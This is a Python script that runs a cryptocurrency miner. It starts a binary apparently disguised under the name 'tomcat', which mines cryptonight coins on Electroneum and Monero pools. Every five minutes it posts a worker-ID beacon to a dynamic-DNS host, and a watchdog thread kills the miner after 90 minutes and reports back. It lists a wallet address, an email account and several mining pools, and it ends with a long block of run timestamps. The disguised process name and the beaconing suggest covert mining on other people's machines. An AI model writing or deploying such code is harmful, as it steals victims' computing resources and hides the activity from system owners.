import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:03.258890
#2018-02-17 16:36:07.515049
#2018-02-17 18:24:04.894660
#2018-02-17 20:12:05.929355
#2018-02-17 21:59:02.172413
#2018-02-17 23:43:04.899029
#2018-02-18 01:33:04.543336
#2018-02-18 03:19:05.935245
#2018-02-18 05:08:03.924095
#2018-02-18 06:59:05.138174
#2018-02-18 08:46:06.551763
#2018-02-18 10:33:04.422315
#2018-02-18 12:18:03.947323
#2018-02-18 14:05:01.406835
#2018-02-18 15:55:01.794758
#2018-02-18 17:44:02.102428
#2018-02-18 19:31:05.141066
#2018-02-18 21:16:05.891849
#2018-02-18 23:04:04.406504
#2018-02-19 00:51:01.400719
#2018-02-19 02:38:06.367038
#2018-02-19 04:24:07.590981
#2018-02-19 06:11:01.712917
#2018-02-19 07:58:05.180029
#2018-02-19 09:50:01.350931
#2018-02-19 11:38:08.185652
#2018-02-19 13:25:05.793516
#2018-02-19 15:13:01.986654
#2018-02-19 17:01:08.763358
#2018-02-19 18:48:07.624808
#2018-02-19 20:37:06.438486
#2018-02-19 22:25:07.486271
#2018-02-20 00:11:06.905059
#2018-02-20 01:58:05.205368
#2018-02-20 03:48:05.005927
#2018-02-20 05:34:03.360831
#2018-02-20 07:18:06.440734
#2018-02-20 09:04:03.645483
#2018-02-20 10:46:05.756349
#2018-02-20 12:32:09.455103
#2018-02-20 14:19:06.182195
#2018-02-20 16:02:04.464190
#2018-02-20 17:49:09.320129
#2018-02-20 19:40:11.021518
#2018-02-20 21:27:01.820443
#2018-02-20 23:10:03.859344
#2018-02-21 00:55:01.526971
#2018-02-21 02:41:05.652473
#2018-02-21 04:28:08.259437
#2018-02-21 06:17:05.446359
#2018-02-21 08:03:04.765186
#2018-02-21 09:48:06.834700
#2018-02-21 11:37:09.057979
#2018-02-21 13:26:05.163151
#2018-02-21 15:11:06.824077
#2018-02-21 17:01:08.220674
#2018-02-21 18:48:04.709280
#2018-02-21 20:31:06.825757
#2018-02-21 22:16:06.177848
#2018-02-22 00:05:07.666360
#2018-02-22 01:53:03.457775
#2018-02-22 03:40:07.250373
#2018-02-22 05:27:06.520891
#2018-02-22 07:12:05.961142
#2018-02-22 08:59:01.432671
#2018-02-22 10:47:01.386509
#2018-02-22 12:33:01.519254
#2018-02-22 14:18:01.735148
#2018-02-22 16:07:08.175175
#2018-02-22 17:54:10.201423
#2018-02-22 19:42:08.307172
#2018-02-22 21:32:06.562201
#2018-02-22 23:20:10.065085
#2018-02-23 01:07:01.428936
#2018-02-23 02:52:07.797220
#2018-02-23 04:40:05.991339
#2018-02-23 06:26:01.911789
#2018-02-23 08:13:05.864162
#2018-02-23 10:31:03.724359
#2018-02-23 12:23:06.687545
#2018-02-23 14:12:06.190524
#2018-02-23 16:02:08.283377
#2018-02-23 17:49:05.189929
#2018-02-23 19:36:07.263958
#2018-02-23 21:18:01.332823
#2018-02-23 23:06:01.656371
#2018-02-24 00:50:06.590283
#2018-02-24 02:35:01.675084
#2018-02-24 04:28:04.918801
#2018-02-24 06:14:07.525682
#2018-02-24 08:02:07.079229
#2018-02-24 09:46:04.734839
#2018-02-24 11:41:07.077449
#2018-02-24 13:33:05.491246
#2018-02-24 15:20:08.102355
#2018-02-24 17:10:06.116790
#2018-02-24 19:02:02.184785
#2018-02-24 20:49:04.282123
#2018-02-24 23:06:05.222608
#2018-02-25 02:22:06.386993
#2018-02-25 05:42:03.873752
#2018-02-25 11:36:06.963105